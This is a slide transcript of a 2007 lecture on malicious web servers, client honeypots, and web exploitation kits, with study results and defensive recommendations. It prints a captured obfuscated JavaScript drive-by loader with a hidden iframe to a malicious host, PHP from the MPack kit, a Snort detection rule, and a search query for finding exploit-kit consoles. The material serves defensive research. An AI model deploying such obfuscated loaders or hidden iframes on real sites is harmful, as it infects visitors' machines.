1 / 33

Malicious Web Servers

Malicious Web Servers. Christian Seifert. IMT551 31 st October 2007. What are we dealing with?. Honeypot.

tilden
Download Presentation

Malicious Web Servers

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Malicious Web Servers Christian Seifert IMT551 31st October 2007

  2. What are we dealing with? Christian Seifert – IMT551

  3. Honeypot • “A honeypot is a security resource whose value lies in being probed, attacked, or compromised. Honeypots do not have a production value, which makes any activity to, on, and from the honeypot suspicious.” (Lance Spitzner, 2000) • A honeypot can • Act as an intrusion detection sensor • Act as a decoy • Inform security researchers on attackers, their methodology and tools Christian Seifert – IMT551

  4. Request Response Request Client Honeypots Attack Malicious Server Benign Server Client Honeypot • Security device that finds malicious servers on a network No state changes detected New file appeared in start up folder Christian Seifert – IMT551

  5. Client Honeypot Purpose • Intrusion detection device (monitor your own servers) • Defensive technology (blacklist identified malicious servers) • Study aid of malicious servers Christian Seifert – IMT551

  6. KYE Study I • Identified malicious URLs with our client honeypot Capture-HPC • Examined malicious URLs, their exploits and deployed malware • Made recommendations to fend off (or at least reduce the risk) of the client-side attack threat • Questions we intended to answer: • What is the risk? • Where are malicious servers located on the web? • Are there any areas at higher risk? • How effective is patching? • How effective is blacklisting? • Are all browsers targeted? If so, to what extent? Christian Seifert – IMT551

  7. Capture-HPC • Open-Source client honeypot (https://www.client-honeynet.org/capture.html) • Ability to drive any HTTP aware client application • Ability to monitor Windows Registry, file system, processes on the kernel level • Collect modified files (malware) • Collect network traffic "file","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EX E","Write","C:\Documents and Settings\Administrator\tmpms45.exe" "process","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE .EXE","created","C:\Documents and Settings\Administrator\tmpms45.exe" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr0.dat“ "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\services.exe","Write","C:\ WINDOWS\system32\config\system" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr1.dat" "process","Oct 25, 2007 5:35:43 PM","C:\Documents and Settings\Administrator\tmp ms45.exe","created","C:\Program Files\Outlook Express\wab.exe" "file","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EX E","Write","C:\Documents and Settings\Administrator\tmpms45.exe" "process","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE .EXE","created","C:\Documents and Settings\Administrator\tmpms45.exe" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr0.dat“ "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\services.exe","Write","C:\ WINDOWS\system32\config\system" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr1.dat" "process","Oct 25, 2007 5:35:43 PM","C:\Documents and Settings\Administrator\tmp ms45.exe","created","C:\Program Files\Outlook Express\wab.exe" Christian Seifert – IMT551

  8. Input URLs • 340,000 URLs inspected by standard WinXP IE6SP2 client honeypot • Specific content categories (adult, forums, music, news, hacker sites) • Previously defaced and vulnerable web servers • Advertisements • Typos (e.g. www.googel.com) • Spam • Known bad sites Christian Seifert – IMT551

  9. Results: Where are malicious servers located on the web? • 0.02 – 0.6 % likelihood of a URL being able to successfully attack a WinXP IE6SP2 installation • Malicious web servers exist everywhere • Spam links, hacker sites, adult sites are high risk areas on the web Christian Seifert – IMT551

  10. Exploits Used / Malware Deployed • Exploits are obfuscated • Antivirus was unable to identify all malware • Social engineering was used to avoid raising suspicion <script language=JavaScript> function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,21,4,60,32,52,45,13,28,0,0,0,0,0,0,5,42,57,37,41,48,62,59,56,24,46,31,38,12,3,27,19,1,39,36,6,26,44,20,9,33,34,0,0,0,0,43,0,15,53,40,8,2,54,16,7,0,14,23,18,11,22,58,35,51,50,29,25,47,10,30,55,49,61);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(250^w&255);w>>=8;s-=2}else{s=6}} document.write(r)}}dc('TaXRdJBCKAsZdLBysmDpjAdE2ksLdFdCKodbIjX52kBpjl7ZlAIxUxHSwocShxzrs_7SKjtRloHysu9xURcpNUBRhx8pPLHSIjDCPoH5i_7SPoDRKltEsPVy2aXRdJBCKlM')\ </script> <iframe src='http://crunet.biz/out.php' width='1' height='1' style='visibility: hidden;'></iframe> “file","Write","C:\Program Files\Internet Explorer\IEXPLORE.EXE","C:\syswcon.exe" “process","Created","C:\Program Files\Internet Explorer\IEXPLORE.EXE","C:\syswcon.exe" “registry","SetValueKey","C:\syswcon.exe","HKCU\Software\ewrew\syswcon\main\cid" ... “file","Write","C:\syswcon.exe","C:\WINDOWS\system32\drivers\uzcx.exe" “process","Created","C:\syswcon.exe","C:\WINDOWS\system32\drivers\uzcx.exe" “registry","SetValueKey", ... ... Christian Seifert – IMT551

  11. Is Blacklisting a successful strategy? • Blacklisting blocks specific IP addresses of hosts on the firewall or DNS server • Stopbadware.org and mvps.org (hosts file) was used in DNS blackholing • 306 malicious sites were once again inspected with our client honeypot • Only 1 URL remained malicious Christian Seifert – IMT551

  12. Is patching a successful strategy? • All malicious URLs inspected with fully patched version of Internet Explorer 6 • Result: 0 successful compromises • Unpatched vulnerabilities… still not safe… • VML vulnerability disclosed September 19, 2006; patch was available September 26, 2006 • ANI vulnerability disclosed March 29, 2007; patch was available April 3, 2007 Christian Seifert – IMT551

  13. What browser is safer to use? • Inspected approx. 30,000 adult content URLs • Used older browsers as they are more vulnerable: • Microsoft Internet Explorer 6.0 SP 2 – Aug 2004 • Mozilla Firefox 1.5.0 – Nov 2005 • Opera 8.0.0 – Apr 2005 • Remote code execution vulnerabilities: Christian Seifert – IMT551

  14. What browser is safer to use? Results Christian Seifert – IMT551

  15. Study Summary • Malicious web servers exist everywhere • SPAM links, hacker sites are particularly risky; adult entertainment sites even more so • Security vendors do know about malicious URLs, but do not know all malicious URLs • Internet Explorer 6 SP2 is more targeted than Firefox or Opera. • A fully patched Internet Explorer 6 was not successfully attacked • Blacklisting reduced the risk significantly. Christian Seifert – IMT551

  16. Recommendations • Use client applications with non-administrative privileges • Use personal firewalls that restrict outbound traffic • Use non-mainstream browser with immediate patching mechanism (e.g. Firefox) • Blacklist (Hosts file, bad sites (e.g. stopbadware.org)) • Patch…think about plug-ins and non-browser applications (Secunia Software Inspector) • Investigate the URLs that users access with a client honeypot, such as Capture-HPC Christian Seifert – IMT551

  17. KYE Study II • Client honeypots are a black box approach • Don’t know what is happening on the malicious web server. • Questions remained unanswered: • How can we explain non-deterministic behavior? • Are browsers other than Internet Explorer targeted? • Are centralized exploit servers a common aspect? • Are there weaknesses in the obfuscation routine? Christian Seifert – IMT551

  18. Web Exploitation Kits • Easily host web based client-side exploits • First appeared in early 2006 • WebAttacker, MPack, IcePack • Costs between 15$ - 1000$ • Simple script-based web applications Christian Seifert – IMT551

  19. Administrative Interface (Mpack) Christian Seifert – IMT551

  20. IP Tracking • Non-deterministic behavior • Only launch attack once • Purpose…unknown 01: //checks and saves user's IP hashed with browser 02: //to avoid future browser's hangup 03: function CheckAddUser() { 04: global $UseMySQL; 05: global $dbstats; 06: $ipua=md5(getenv("REMOTE_ADDR").getenv("HTTP_USER_AGENT")); 07: if ($UseMySQL==0) { 08: //text variant 09: $fn="users.txt"; 10: if (file_exists($fn)) { 11: $lines = file($fn); 12: if (in_array($ipua."\n", $lines)==TRUE) { 13: echo ";["; 14: exit; 15: } 16: } ... Christian Seifert – IMT551

  21. Targets? IcePack Targets: • Microsoft Data Access Component Vulnerability (CVE-2006-0003) • WebViewFolderIcon ActiveX Control Buffer Overflow Vulnerability (CVE-2006-3730) • Microsoft Management Console Vulnerability (CVE-2006-3643) • Vector Markup Language Vulnerability (CVE-2007-0024) • Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX (CVE-2007-4336) • Yahoo! Messenger Webcam ActiveX Remote Buffer Overflow Vulnerability (CVE-2007-3147, CVE-2007-3148) • Yahoo! Widgets YDP ActiveX Control Buffer Overflow Vulnerability (CVE-2007-4034) • Windows Media Player Plug-In with Non-Microsoft Internet Explorer Vulnerability (CVE-2006-0005) • Windows Media Player Plug-In with Non-Microsoft Internet Explorer Vulnerability (CVE-2006-0005) • JavaScript Navigator Object Vulnerability (CVE-2006-3677) Christian Seifert – IMT551

  22. Exploit Servers • Administrative interfaceprovides information Christian Seifert – IMT551

  23. Exploit Servers • High value information • Easily identifiable • Via crawlers & IDS signatures: • Or search engine queries: • inurl:”admin.php” “All activity is being monitored” alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Access to MPack v0.94 web exploitation kit administrative console” flow:from_server,established; uricontent:"/admin.php”; content:"All activity is being monitored"; reference:url, http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/2005/2011/MPack.pdf; classtype:bad-unknown; sid:TBD; rev:1;) Christian Seifert – IMT551

  24. Obfuscation • Obfuscation is the mechanism to hide attacks from signature based approaches by modifying the appearance of the malicious content • How effective is it? • Web exploitation kits were using little randomization. 001 - “dsasdhajkh” 002 - “fdshfjqeqqeq” “malicious content” … 255 - “ffdsfdsasaq” Christian Seifert – IMT551

  25. Summary • Access to web exploitation kits give us insights into malicious web servers that client honeypot can not provide us • Web exploitation kits are a threat, but also a blessing (homogenizing effect) • Implications on client honeypot technology • Stock Windows XP SP2 installation insufficient. Third-party apps need to be considered • Distributed architecture will be required Christian Seifert – IMT551

  26. Incident Response • Assume you discover an attack by a malicious web server. The attack has caused great damage and you would like to track down and prosecute the person responsible. • How would you go about it? • What data would you collect? Christian Seifert – IMT551

  27. Food For ThoughtAddress Resolution Protocol (ARP) 6. Http Response 1. Http Request to Web Server at IP 192.168.77.250 4. Http Request to 192.168.77.250 2. Who has IP 192.168.77.250? 3. I have that IP! 5. Http Response Christian Seifert – IMT551

  28. Food For ThoughtARP 9. Malicious Http Response 1. Http Request to Web Server at IP 192.168.77.250 2. Who has IP 192.168.77.250? 5. Http Request to 192.168.77.250 4. I have that IP! 8. Malicious Http Response 6. Http Request 3. I have that IP! 7. Http Response Christian Seifert – IMT551

  29. Food For ThoughtDomain Name Resolution • Translate host names (e.g. www.google.com) to IP addresses (72.14.253.99) Where is www.google.com? www.google.com is at 72.14.253.99 Christian Seifert – IMT551

  30. Food For ThoughFast Flux Networks Where is www.badsite.com? www.badsite.com is at 130.14.253.99 Where is www.badsite.com? www.badsite.com is at 130.195.38.22 Christian Seifert – IMT551

  31. Food For ThoughFast Flux Networks 1 Where is www.badsite.com? Try this one 2 www.badsite.com is at 130.182.12.11 Try this one 3 www.badsite.com is at 130.182.12.11 Christian Seifert – IMT551

  32. Conclusion • Incident response not so easy • Expect the unexpected • Perform an analysis/ practice before an incident occurs Christian Seifert – IMT551

  33. http://www.honeynet.org/papers/mwshttps://www.client-honeynet.orghttp://en.wikipedia.org/wiki/Client_honeypot_/_honeyclient Questions?http://www.honeynet.org/papers/mwshttps://www.client-honeynet.orghttp://en.wikipedia.org/wiki/Client_honeypot_/_honeyclient Questions?

More Related